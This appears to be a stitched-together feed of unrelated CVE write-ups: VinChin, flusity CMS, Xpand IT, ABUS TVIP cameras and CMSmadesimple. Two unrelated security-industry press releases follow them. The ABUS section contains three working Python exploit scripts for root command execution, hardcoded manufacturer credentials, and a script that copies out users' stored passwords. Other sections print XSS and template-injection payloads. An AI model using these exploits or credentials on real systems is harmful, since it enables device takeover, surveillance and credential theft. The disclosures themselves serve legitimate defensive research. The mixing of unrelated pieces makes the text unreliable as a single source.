VinChin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.* was discovered to contain hardcoded credentials.

Sun Oct 15, 2023 by BloodyShell in  vulnerability, research, LeakIX  vulnerability, research, LeakIX

**Vulnerability research**

At LeakIX we analyse new vulnerabilities discovered by other researchers every day.

Our goal is to understand them, discover non-intrusive ways to detect them and provide our customers with a list of vulnerable assets.

While researching what others have already found is always an exciting challenge and provides valuable experience, it was time for us to go through the research and disclosure process first hand and get our first CVE on the board.

We decided to look for issues in critical software. It was natural for us to select the “Infrastructure Backup” category. Such software will hold an entire organisation’s data but also credentials to critical points of the network, including:

*   Servers
*   Hypervisors
*   Storage
*   Cloud accounts

**VinChin Backup**

VinChin Backup & Recovery is an **all-in-one backup solution for virtual infrastructures** supporting VMWare, KVM, Xen Server, Hyper-V, OpenStack and more. The product also supports AWS, Azure and other cloud providers as backup storage.

It is used by companies like Sony, Guizhou Power Grid, and while its main market is located in Asia, it has decent adoption on other continents and protects over 10,000 clients.

**CVE-2023-45499**

During our research we discovered an HTTP API exposed by VinChin Backup. This API can be accessed using hard-coded credentials.

The privileges granted are high since ACLs are bypassed for this authentication method.

The list of actions available from the API includes:

*   View/Edit/Add/Delete storage
*   View/Delete backups
*   View/Edit/Add/Delete jobs
*   View/Edit/Add/Delete cloud accounts
*   View/Edit/Add/Delete hypervisors
*   View/Edit/Add/Delete users
*   Query various information such as:
    *   Services status
    *   System information
    *   Licensing

The list is non-exhaustive.

**CVE-2023-45498**

While exploring the various functionalities exposed by the API a particular endpoint was found vulnerable to improper input sanitization. A specially crafted payload results in remote code execution allowing the attacker to execute code with the permissions of the web server.

**Demo**

**Affected versions**

During our routine scans we identified vulnerable products starting from 5.0 up until the last known version.

**IOC**

Any requests made to /api/ from an untrusted IP should be considered suspicious. The log can be found in /var/log/nginx/access.log.

**Mitigation**

At this point VinChin has not acknowledged the issue despite our multiple requests, we can only recommend to remove all exposed instances from untrusted network.

**Timeline**

    2023-09-22: LeakIX makes initial contact
    2023-09-25: VinChin request details
    2023-09-25: LeakIX request Safe harbour
    2023-09-26: No reply, LeakIX requests update
    2023-09-27: No reply, LeakIX sends PoC
    2023-09-29: No reply, LeakIX requests feedback
    2023-10-05: No reply, LeakIX requests feedback
    2023-10-10: No reply, LeakIX requests feedback from alternative email
    2023-10-11: No reply, LeakIX requests feedback from another alternative email
    2023-10-16: No reply, CVE reserved and vendor notified
    2023-10-18: No reply, LeakIX sent 7 day disclosure warning
    2023-10-24: LeakIX sends early warning to providers hosting VinChin on their network.
    2023-10-26: No reply, Publishing this advisory

CVE-2023-45499: CVE-2023-45498: RCE in VinChin Backup

A vulnerability, which was classified as problematic, has been found in flusity CMS. This issue affects the function loadPostAddForm of the file core/tools/posts.php. The manipulation of the argument edit_post_id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier of the patch is 6943991c62ed87c7a57989a0cb7077316127def8. It is recommended to apply a patch to fix this issue. The identifier VDB-243641 was assigned to this vulnerability.

To manage this project more efficiently, we recommend creating a version identifier and recording which bugs or vulnerabilities are fixed in each version. This will help ensure continuous improvement and quality control of the project, while also facilitating communication and collaboration among team members. Here are some suggestions to improve this project: 1. Assign a unique number to each version, such as v1.0, v2.0, etc. This will help clearly differentiate between different versions. 2. Detail the new features, improvements, and fixed bugs or vulnerabilities of each version in the version release notes. This will help users understand what each version is about. 3. Conduct code reviews during key stages of the project to ensure code quality and follow best practices.

> Thank you for spotting and reporting security holes in the code. Following your observations, I reviewed the code and implemented the recommended security improvements. Using the PHP functions filter\_input() and htmlspecialchars(), I sanitized and encoded all the data that comes from the URL parameters. This should prevent any XSS-type attacks. I think these changes will increase the security and quality of the project. If you have any further observations or recommendations, be sure to let me know. Thanks again for your help and attention. 2023-10-24, an, 13:36 光头强不会砍树了 _**@**_._**\> rašė:  
> …  
> After installation, log in to the backend using the default account password tester/1234 select posts \[image: image\] https://user-images.githubusercontent.com/113713406/277630999-f5b40b5c-fd5b-4b35-99e3-2d5305974934.png enter payload ?edit\_post\_id=3);</script><script>alert(1024)</script> \[image: image\] https://user-images.githubusercontent.com/113713406/277631071-2445c0a4-1cf0-4533-a7bd-bad1f5a9d050.png execution results \[image: image\] https://user-images.githubusercontent.com/113713406/277631314-33adb1b1-31ee-4e9d-ba6d-13fee97753cf.png Use burpsuite to capture packets. \[image: image\] https://user-images.githubusercontent.com/113713406/277631397-d096f43e-7b1c-419c-8e20-0fb0781a3a86.png if (isset($\_GET\['edit\_post\_id'\])) { $edit\_post\_id = $\_GET\['edit\_post\_id'\]; echo "<script>loadPostEditForm($edit\_post\_id);</script>"; } The vulnerable code location is line 274 in core/tools/posts.php — Reply to this email directly, view it on GitHub <#2\>, or unsubscribe https://github.com/notifications/unsubscribe-auth/AZINVW6OYZ7U36MRA3P4BFDYA6K37AVCNFSM6AAAAAA6NPHKJCVHI2DSMVQWIX3LMV43ASLTON2WKOZRHE2TQOJWG4YTANI . You are receiving this because you are subscribed to this thread.Message ID: _**@**_.**_\>  
> \-- Pagarbiai, Darius Jakaitis

CVE-2023-5810: edit_post_id in posts.php_ XSS (Cross Site Scripting) exists for the place parameter · Issue #2 · flusity/flusity-CMS

Xpand IT Write-back manager v2.3.1 allows attackers to perform a directory traversal via modification of the siteName parameter.

During an authorised penetration testing assessment conducted on Xpand IT’s Write-Back software, Balwurk’s security team found multiple security vulnerabilities, first disclosed to the customer and then responsibly submitted to the MITRE CVE program.

The discovered vulnerability allows an attacker to change the directory to which an uploaded file is saved on the filesystem.

This blog post is the second post of a five-part series in which we will technically describe five security vulnerabilities and how they were detected and exploited.

**What is Write-Back?**

Write-Back is a Tableau extension that enables users to submit data directly from a Tableau dashboard to your database, allowing them to implement any actionable use case without leaving the analysis flow.

Write-Back allows users to take the Tableau usage further and implement use cases where you need users to input data, such as forecasting, planning, adding comments, or any actionable process. Includes features like on-premises execution, audit, multiple back-end databases, and integrated authentication.

Before diving into more technical details, we should describe the layout of Write-Back’s high-level back-end architecture:

**Write-Back (Server)**: Tableau extensions are web-based and deployed on a separate application server from the Tableau Server/Cloud. This means that Write-Back should be placed side by side with Tableau, ideally on a separate machine. Users will interact with the Write-Back extension through the Tableau dashboards that can be on different Tableau platforms, i.e., Tableau Desktop, Tableau Server, or even Tableau Cloud.

**Write-Back Manager**: Centralizes all configurations and enables platform administrators to take full control of how Write-Back is configured. All of this is done on a web UI. Each Write-Back installation has its own Write-Back manager deployed on the same machine, allowing it to manage that instance.

**Technical description**

CVE-2023-27170 is a path or directory traversal security vulnerability that allows an authenticated user to upload a file to any location on the file system using any of the multiple file upload features on the Write-Back Manager.

This vulnerability was initially detected by changing the uploaded filename through a man-in-the-middle attack.

In the particular case of the customised logo upload feature, the name under which the logo file would be written to disk equalled the value passed in the siteName parameter, which by default was always 00000000-0000-0000-0000-000000000000. By manipulating the value of this parameter and adding special characters such as dots ‘.’ and slashes ‘/’, an attacker can change the path to which the file will be written:

**_Figure 1 – Logo file upload._**

In this example, the logo was placed in one folder hierarchically above the logos folder:

**_Figure 2 – Logo file uploaded to a different folder._**

The root cause of this vulnerability can be found in the uploadLogoFile function of the ThemesManager class, which handles the upload of a custom logo file:

**_Figure 3 – Cause of the vulnerability._**

The siteName parameter is simply concatenated together with the file extension and added to the writePath, resulting in the manipulation of the folder’s path to which the file is uploaded to.

**Impact**

This vulnerability could potentially be exploited in multiple manners. A malicious user could overwrite critical files, upload massive files, cause a file space denial of service, or upload dangerous files into the web tree to achieve code execution.

**CVE ID:** CVE-2023-27170  
**CVSS 3.1 Base Score:** 5.5  
**CVSS Vector:** AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L  
**Affected Vendor:** Xpand IT  
**Affected Product:** Write-Back  
**Affected Version:** Write-Back Manager v2.3.1

**Mitigation**

Update Write-Back to at least version 4.1.

**Timeline**

12-12-2022 – Vulnerability detected and reported to Write-Back.

22-02-2023 – Vulnerability submitted to MITRE.

10-03-2023 – Vulnerability accepted and CVE-2023-27170 reserved.

12-07-2023 – Official Patch released by Write-Back team.

20-10-2023 – Public disclosure of CVE-2023-27170.

**Credits**

**Bruno Pincho** | Penetration Tester at Balwurk 

**References**

*   https://writeback4t.com

CVE-2023-27170: CVE-2023-27170 - Improper Limitation of a Pathname to a Restricted Directory - Balwurk

Due to incorrect access control, unauthenticated remote attackers can view the /video.mjpg video stream of certain ABUS TVIP cameras.

**Background⌗**

It was a chill friday evening when Ilias, Alexander and myself sat around our local hackspace Chaosdorf, ate some pizza and played around with the ABUS security camera we were able to get in our hands shortly before. As the company has quite some reputation in Germany, we assumed that there wouldn’t be much to find security-wise, also because this camera was one of the most expensive ones in the consumer market. Little did we know that we’d get our first CVEs and security fame that evening as well…

**Objective⌗**

> August Bremicker und Söhne KG, commonly known as ABUS, is a German manufacturer of preventative security technology based in Wetter, North Rhine-Westphalia.
> 
> *   Wikipedia

While ABUS is mostly focusing on physical security technology like door locks and chains, security cameras are also an important branch of their portfolio. Those cameras are bought from a white-label producer, branded and sold. In this case, the affected cameras were produced by taiwanese producer Grain Media with the GM812X chipset.

This means that the discovered vulnerabilities were not necessarily ABUS’ fault, as they didn’t develop the firmware. They could’ve conducted penetration tests though.

Affected by the vulnerabilities are the model numbers / lines:

*   Compact Cameras
    *   TVIP10000
    *   TVIP10001
    *   TVIP10005
    *   TVIP10005A
    *   TVIP10005B
    *   TVIP10050
    *   TVIP10051
    *   TVIP10055A
    *   TVIP10055B
    *   TVIP10500
    *   TVIP10550
    *   TVIP11000
    *   TVIP11050
    *   TVIP11500
    *   TVIP11501
    *   TVIP11502
    *   TVIP11550
    *   TVIP11551
    *   TVIP11552
*   Cameras with movable head
    *   TVIP20000
    *   TVIP20050
    *   TVIP20500
    *   TVIP20550
    *   TVIP21000
    *   TVIP21050
    *   TVIP21500
    *   TVIP21501
    *   TVIP21502
    *   TVIP21550
    *   TVIP21551
    *   TVIP21552
    *   TVIP22500
*   Dome cameras
    *   TVIP31000
    *   TVIP31001
    *   TVIP31050
    *   TVIP31500
    *   TVIP31501
    *   TVIP31550
    *   TVIP31551
    *   TVIP32500
*   Box cameras
    *   TVIP51500
    *   TVIP51550
*   Outside dome cameras
    *   TVIP71500
    *   TVIP71501
    *   TVIP71550
    *   TVIP71551
    *   TVIP72500

Those cameras were sold from 2010 to 2014.

**Timeline⌗**

*   XX-09-2018: Discovery of vulnerabilities in lab environment
*   XX-09-2018: Communication with CCC e.V. for disclosure handling
*   26-11-2018: Initial contact with ABUS, no response
*   18-02-2019: Start of responsible disclosure process with ABUS
*   03-05-2019: Public Announcement by ABUS for a replacement program
*   07-05-2019: Publication of CCC blogpost

This disclosure was picked up by German press shortly after: Heise, Golem, SPIEGEL Online

**Vulnerabilities⌗****CVE-2018-16739⌗**

Authenticated read and write access through directory traversal with command execution

**Description⌗**

Through directory traversal it is possible to utilize the file browser of the web frontend, which seems to be only for displaying file server content, for arbitrary read, write and execution. The browser can be used to read and write files outside the file server directory and to list the contents of any directory. This is done with root privileges.

The affected endpoints are:

*   /cgi-bin/admin/fileread?READ.filePath=<Path> to read the specified file
*   /cgi-bin/admin/filewrite?SAVE.filePath=<Path> to write to the specified file
*   /cgi-bin/admin/sdstate?action=filelistnas&directory=<Path> to list a directory

**Exploitation⌗**

For arbitrary read and write, the exploitation of the endpoints is as simple as it gets, by prefixing the desired path with ../../../../ or by specifying an absolute path.

A trick is required to move from arbitrary write to code execution: if a bash script is placed in the CGI scripts folder of the web server and this script is called via a web browser, the shell script is executed with root privileges. This is also the trick applied on the POC exploit:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import random
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-16739")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        referenceID = random.randint(1000, 9999)
    
        print(huepy.cyan("[~] Exploit for CVE-2018-16739"))
        print(huepy.cyan("    Your reference number is %i." % (referenceID)))
    
        prepareShell(args.url, referenceID, args.cmd)
        execCmd(args.url, referenceID)
        readCmd(args.url, referenceID)
        mrproper(args.url, referenceID)
    
    
    def prepareShell(target, refID, cmd):
        writeCmd(target, refID, "#!/bin/sh\n%s 1>/tmp/%i.log 2>&1" % (cmd, refID))
    
    
    def writeCmd(target, refID, cmd):
        percentCmd = urllib.parse.quote(cmd)
        print(huepy.yellow("[~] writing /opt/cgi/admin/%i.sh" % (refID)))
        r = requests.get("%s/cgi-bin/admin/filewrite?SAVE.filePath=/opt/cgi/admin/%i.sh&SAVE.fileData=%s" % (target, refID, percentCmd), verify=False)
    
    
    def execCmd(target, refID):
        print(huepy.yellow("[~] Executing reference number %i..." % (refID)))
        r = requests.get("%s/cgi-bin/admin/%i.sh" % (target, refID), verify=False)
    
    
    def readCmd(target, refID):
        r = requests.get("%s/cgi-bin/admin/fileread?READ.filePath=/tmp/%i.log" % (target, refID), verify=False)
        print(huepy.green("[+] Command returned on %i:\n" % (refID)) +  r.text)
    
    
    def mrproper(target, refID):
        print(huepy.green("[+] mrproper-ing your waste..."))
        writeCmd(target, refID, "#!/bin/sh\nrm /tmp/%i.log /opt/cgi/admin/%i.sh" % (refID, refID))
        execCmd(target, refID)
    
    
    if __name__ == '__main__':
        main()
    

Note that, as the OS injection itself is blind, log output of your command(s) needs to be written into a log file and read again after the command finishes. This means that if your command runs for an hour, you’ll only be able to get the output after an hour.

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17558⌗**

Hardcoded administrator account with code execution as root

**Description⌗**

The web server is protected against unauthorized access by a user name and password, which can be changed by the person who purchased the camera. This is admin:12345 or admin:admin by default, dependent on software and model. This is dangerous in itself, since an attacker can exploit the fact that the owner of the camera usually does not change this password.

Regardless of the initial values for the admin user account, the web server is also configured to accept the user name manufacture with the password erutcafunam for the /cgi-bin/mft directory in the web server’s root directory. These values cannot be deleted by the owner of the camera, nor can they be changed. This means that all cameras running with the affected software versions can be accessed using this user name and password.

There are several endpoints in the /cgi-bin/mft directory. These endpoints are responsible for changing the WiFi settings of the device. These can be attacked at various points through an OS injection to execute code with root privileges:

**Evaluation⌗**

If the manufacture user account is combined with the input attack, it is possible to execute arbitrary code as root on the camera from outside, even if the owner of the camera has chosen secure passwords. These are simply bypassed.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:C/A:C = Base Score **10.0**

**Exploitation⌗**

Obviously, using the hard-coded credentials for your purposes is as easy as it gets.

Bringing together the puzzle pieces “hardcoded credentials” and “OS injection” gives you endless possibilities; one of them is to leak out the (user-managed) credentials:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    import base64
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17558")
        parser.add_argument('ip', type=str, help='target IP, eg 127.0.0.1')
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17558"))
    
        copyCreds(args.ip) and showCreds(args.ip) and delCreds(args.ip)
    
    
    def copyCreds(target):
        print(huepy.yellow("[~] Copying creds"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;cp%%20/var/www/secret.passwd%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL!"))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def showCreds(target):
        print(huepy.yellow("[~] Here are the credentials of %s" % (target)))
        r = requests.get("http://%s/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL! Here you go:"))
            print("Rights\t\t| Password\t|")
            for line in r.text.split("\n"):
                if "0000" in line:
                    parts = line.split(" ")
                    print("%s\t| %s\t|" % (parts[0], base64.b64decode(parts[1]).decode("utf-8")))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def delCreds(target):
        print(huepy.yellow("[~] Cleaning up"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;rm%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] Successful. Thanks for your cooperation."))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    if __name__ == '__main__':
        main()
    

**CVE-2018-17879⌗**

Remote code execution through OS injection

**Description⌗**

The /cgi-bin/ directory contains several scripts that are used to control and configure the camera. Among other tasks, these scripts are responsible for changes to the camera’s image settings (contrast, color values, brightness) or the network settings of the device. The attack is based on the fact that some of the scripts do not check input that comes from the user and are passed directly to the system() command. If control characters are used to spoof the user input, arbitrary C ode can be executed. For example, such an input could look like this: $(shutdown -h now). This would shut down the camera from the outside. An attacker could use this to completely take over the camera, attack the internal network (private or corporate), launch further attacks from the camera, as well as change, pause or delete the camera’s image, and completely disable the camera.

**Exploitation⌗**

As simple as wrapping a reverse shell code in $(...).

See this exploit, where the injection happens in the UPnP HTTP Port field:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17879")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17879"))
    
        execCmd(args.url, args.cmd)
    
    
    def execCmd(target, command):
        print(huepy.green("[~] Executing command '%s'..." % (command)))
        percentCommand = urllib.parse.quote(command)
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1%%3e/dev/null%%202%%3e/dev/null;%s;false" % (target, percentCommand), verify=False)
        print(r.text[:-3])
        print(huepy.yellow("[~] Cleaning up..."))
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1337" % (target), verify=False)
    
    
    if __name__ == '__main__':
        main()
    

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17878⌗**

Remote code execution through buffer overflows

**Description⌗**

Almost all of the CGI scripts used by the web server take user input to know what to do. The function that is internally responsible for copying this input is sprintf(). This function is vulnerable to a buffer overflow. This allows an attacker, by typing in a specially crafted string, to write over the memory allocated to it, and thus gain complete control of the program and achieve code execution as root.

**Exploitation⌗**

Depending on the binary, buffer size and stack; as no security protections like stack canaries or NX / Data Execution Prevention are in place, this could be easily done via either Shellcode or ROP.

**Evaluation⌗**

CVSS v2: AV:N/AC:H/Au:S/C:C/I:C/A:C = Base Score **7.1**

**CVE-2018-17559⌗**

Access control bypass

**Description⌗**

The web server gets the camera feed from the CGI script /opt/cgi/jpg/image. This script delivers the current frame every second. This script is symlinked to many places in the file system. Among others to /cgi-bin/admin/image, /cgi-bin/admin/image.jpg, /tmp/video.mp4, /cgi-bin/operator/image.jpg.

Most of these endpoints are password protected in the configuration file of the webserver, boa.conf. However, on lines 314-321 it can be seen that after the script and the symlinks to the script are password protected, they are transferred somewhere else again, and these new endpoints are not password protected:

    # boa.conf, L314-321
    Auth /cgi-bin/jpg /var/www/secret.passwd
    
    # [...]
    
    Transfer /video.mp4 /tmp/video.mp4
    Transfer /video.3gp /tmp/video.mp4
    Transfer /video.mjpg /tmp/video.mp4
    Transfer /video.h264 /tmp/video.mp4
    

This results in an attacker accessing /video.mp4 or /video.mjpg being able to view the video feed without the need to authenticate.

**Exploitation⌗**

Access /video.mp4 or /video.mjpg to see the video feed without authentication.

**Evaluation⌗**

As the video stream is the most important output of a security camera, being able to circumvent the protection of the video stream is critical, especially taking into consideration what direction and perspective the camera is facing.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:N/A:N = Base Score **7.8**

**Overall Evaluation & Conclusion⌗**

An attacker can completely take over the camera, attack the internal network (private or company network), launch further attacks from the camera, change or delete the image of the camera, or completely disable the camera, as well as put the camera completely out of operation. This could be particularly problematic in security-critical scenarios, e.g., criminal acts that are recorded and documented by the camera, as evidence could be lost.

While the replacement program may give end users new cameras (which are hopefully not prone to the security issues described here, but I didn’t test that), the risk of having a always-on security device with weak hardware and network access persists. Please put such devices in a separate network or VLAN, protect it with firewall rules, and avoid credential reusage. Reviewing if you really need cameras connected to the internet could be another important step in becoming more secure.

CVE-2018-17559: Five Vulnerabilities in ABUS cameras

Hardcoded manufacturer credentials and an OS command injection vulnerability in the /cgi-bin/mft/ directory on ABUS TVIP TVIP20050 LM.1.6.18, TVIP10051 LM.1.6.18, TVIP11050 MG.1.6.03.05, TVIP20550 LM.1.6.18, TVIP10050 LM.1.6.18, TVIP11550 MG.1.6.03, TVIP21050 MG.1.6.03, and TVIP51550 MG.1.6.03 cameras allow remote attackers to execute code as root.

CVE-2018-17558: Five Vulnerabilities in ABUS cameras

An issue was discovered on certain ABUS TVIP cameras. The CGI scripts allow remote attackers to execute code via system() as root. There are several injection points in various scripts.

CVE-2018-17879: Five Vulnerabilities in ABUS cameras

Buffer Overflow vulnerability in certain ABUS TVIP cameras allows attackers to gain control of the program via crafted string sent to sprintf() function.

CVE-2018-17878: Five Vulnerabilities in ABUS cameras

An issue in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload to the Content Manager Menu component.

**CMSmadesimple SSTI v2.2.18****Author: (Sergio)**

**Description:** Server Side Template Injection (SSTI) vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

**Attack Vectors:** A SSTI vulnerability in the sanitization of the entry in the Content of "Content - Content Manager Menu" allows injecting a malicious payload into a template code that will be executed when the user accesses the web page.

**POC:**

When logging into the panel, we will go to the "Content Manager- Title" section off Content Menu.

  
We edit that Content field with a template malicious payload.**SSTI Payload:**  
In the following image you can see the embedded code that executes the payload in the main web.

  
We identify the technology used with the following payload.**SSTI Payload:**

  
And the result is the following:

  
Since the payload has worked we know that it uses Smarty, then we obtain the Smarty version with the following payload:**SSTI Payload:**

And in the result we can see the version of Smarty using the SSTI:

  
We can also use the following payload to see the server name variable:**SSTI Payload:**

{$smarty.server.SERVER\_NAME}

  
Below is the result of the SSTI payload with the server name:

  
**Additional Information:**

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03\_2021-Injection/

CVE-2023-43352: GitHub - sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content: SSTI vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to use native template syntax to inject a malicious payload into a te

**PRESS RELEASE**

**SHORT HILLS, N.J.****,** **Oct. 26, 2023** **/PRNewswire/ --** Cranium, the leading enterprise AI security and trust software firm, today announced that the company has raised $25 million in Series A funding. Telstra Ventures led the round with participation from KPMG LLP and SYN Ventures. Both participating investors previously provided seed funding when Cranium emerged from stealth six months ago and spun out of KPMG with additional investment from SYN Ventures.

The new round brings Cranium's total funding to $32 million. The funds will be used for innovation, research and development (R&D), and business expansion. Cranium's newest round will build company growth, strengthen customer momentum, and accelerate Cranium Enterprise software platform innovation through product development; scale go-to-market strategies, including sales and marketing efforts; allow investment in R&D to further visibility into the security of AI systems; enhance security, regulation, and compliance in AI/ML environments against adversarial threats; and reinforce its teams and customers with additional support.

"AI is being embedded into every business process and function at an unprecedented speed. Prioritizing responsible AI now, at the beginning of the AI revolution, will allow enterprises to scale more effectively and not run into major roadblocks and compliance issues later," said Jonathan Dambrot, CEO and Co-Founder of Cranium. "We're honored and deeply grateful for the support from our customers and investors whose dedication to Cranium only fuels our commitment to provide unparalleled visibility, trust, and a new level of security when it comes to the entire AI ecosystem of any organization."

Cranium helps organizations gain confidence in the AI-enabled products in services they are both creating and using. Cranium's software is custom-built to address the gap between data science, compliance, and cybersecurity teams by providing a single source of truth for AI security risks, which is done in a way that avoids requiring teams to change their processes, tools, or workflows; its value is ensuring AI systems are secure, trustworthy, and compliant, properly handling vital resources such as health, financial, and consumer data to meet compliance regulations.

"The rapid rate of innovation fueled by the emergence of GenAI capabilities has generated fresh challenges for cybersecurity teams, raising new questions over compliance, trustworthiness, and security of their AI/ML environments," said Marcus Bartram, General Partner at Telstra Ventures. "Cranium stands at the forefront of AI security and trust software, empowering organizations to navigate the crowded cybersecurity industry with its groundbreaking product and pioneering innovations addressing enterprises' urgent needs grappling with AI regulation, compliance, and security frameworks. We're thrilled to invest in the team at Cranium and are confident in the tremendous impact they're poised to make."

Since its inception, Cranium's dedication to making AI security attainable by working with global leaders in health sciences, financial services, consumer packaged goods, and retail showcases its versatility and holistic view of the AI industry. As the first-ever technology spinout out of KPMG's startup incubator, Cranium's mission is to secure the AI revolution, enabling organizations to secure their AI technologies. Cranium's unique design and features, grounded in years of industry experience and high-level partnerships, lend it a distinct edge in the increasingly crowded cybersecurity market.

**About Cranium**

Cranium is the leading enterprise AI security and trust software firm, enabling organizations to gain visibility, security, and compliance across their AI and GenAI systems. Organizations can map, monitor, and manage their AI/ML environments against adversarial threats without interrupting how teams train, test, and deploy their AI models through its Cranium Enterprise software platform. The Cranium platform also allows organizations to quickly gather and share information about the trustworthiness and compliance of their AI models with their third parties, clients, and regulators. Incubated and funded in stealth inside of KPMG Studio, Cranium helps cybersecurity and data science teams understand that AI impacts their systems, data, or services everywhere. Secure your AI at Cranium.AI.

**About Telstra Ventures**

Telstra Ventures Accelerates the Extraordinary – we fuel the growth of standout disruptors. In our first eleven years, 96 investments have generated 38 liquidity events including Auth0, BigCommerce, Box, CrowdStrike, DocuSign, Rancher, Skillz, Snap, and Whispir. To date, our Revenue Acceleration Platform has driven > US$500 million in revenue for our portfolio companies, extending their reach across Australia, Asia, UK and the US. In 2022, we announced the close of our third fund, bringing Funds Under Management to US$1 Billion. To see our full portfolio and learn more, visit www.telstraventures.com.

Cranium Announces $25 Million in Series A Funding to Secure AI

**PRESS RELEASE**

**DENVER****,** **Oct. 26, 2023** **/PRNewswire/ --** New data from the Lumen Technologies (NYSE: LUMN) Distributed Denial of Service (DDoS) mitigation platform landed the banking industry in the unenviable position of being the most targeted vertical of Q3 2023. This is the first time the banking industry topped Lumen's "most targeted verticals" list and was largely due to the events of a single day: Sept. 21, 2023.

On that day, a single banking customer was targeted with more than 230 DDoS attacks – a whopping 4,500% increase over the daily average for that industry – yet it experienced no downtime. Had the attackers been successful, they could have caused significant damage in the form of lost business, remediation costs and reputational damage.

"The successful mitigations for this banking customer can be traced back to Lumen's multi-layered approach to DDoS mitigation," said Brett Lemarinel, director of unified threat management for Lumen. "It starts at our network, where countermeasures are built in, and our intelligent routing technology, which sends excess traffic through our 500+ scrubbing locations. Our DDoS customers have an added layer of protection from Rapid Threat Defense, our proprietary capability that utilizes threat intelligence from Lumen Black Lotus Labs® to block DDoS botnet traffic before it reaches the customer's environment."

Lemarinel continued, "This should be a warning to all other businesses. More than 230 mitigations in a single day suggests the threat actor was determined to wreak havoc on this customer. Even though the attacker failed, the activity we saw on Sept. 21 is a potent reminder that any business can be in an attacker's crosshairs on any given day."

**Other notable findings in the report include:**

A never-before-seen, four-vector combination was attempted during the Sept. 21 event. The four-vector combination included DNS Amplification, IP Fragmentation, Invalid Packets and Static Filtering. Cyber attackers frequently modify their vector combinations as they attempt to defeat mitigation strategies, but the Lumen DDoS mitigation platform has the flexibility required to recognize and stop these attacks before they impact the targeted customers. The total number of attacks decreased in Q3 2023. Attackers frequently run their operations like a business and, as with any business, cyberattacks have seasonal ups and downs. In Q3 2023, Lumen mitigated 4,217 attacks, which was a 23% quarter-over-quarter decrease and a 24% annual decrease. The banking industry was also the most-targeted vertical for application threats, according to Lumen's application protection partner, ThreatX. Among all industries, the highest percentage of blocked traffic (25.5%) came from programmatic access, which are suspicious, automated attempts to access a web application. This number is up 89% from the previous quarter. The banking sector experienced a significant percentage of "Attacks Against Authentication" (nearly 25%), which are used to gain unauthorized access to financial data. Financial institutions are attractive to attackers, as evidenced by the high attack ratio and combination of brute-force attacks that targeted banks in Q3. Protecting financial data is paramount, but robust web application and API protection solutions can help protect the industry.

"The Q3 ThreatX application attack analysis underscores the critical importance of bot protection and the need for awareness of industry-specific threats," said Neil Weitzel, director, Security Operations Center at ThreatX. "The especially high number of programmatic access threats this quarter underscores the prevalence of bots in API and application attacks. In addition, our findings reveal variations in threats across industries, so businesses must stay vigilant and proactive to safeguard their applications and APIs."

**About Lumen Technologies**

Lumen connects the world. We are igniting business growth by connecting people, data, and applications – quickly, securely, and effortlessly. Everything we do at Lumen takes advantage of our network strength. From metro connectivity to long-haul data transport to our edge cloud, security, and managed service capabilities, we meet our customers' needs today and as they build for tomorrow. For news and insights visit news.lumen.com, LinkedIn: /lumentechnologies, Twitter: @lumentechco, Facebook: /lumentechnologies, Instagram: @lumentechnologies, and YouTube: /lumentechnologies.

**About ThreatX**

ThreatX is managed API and application protection that lets you secure them with confidence, not complexity. It blocks botnets and advanced attacks in real time, letting enterprises keep attackers at bay without lifting a finger. Trusted by companies in every industry across the globe, ThreatX profiles attackers and blocks advanced risks to protect APIs and applications 24/7. Learn more at https://www.threatx.com.

Tag

#auth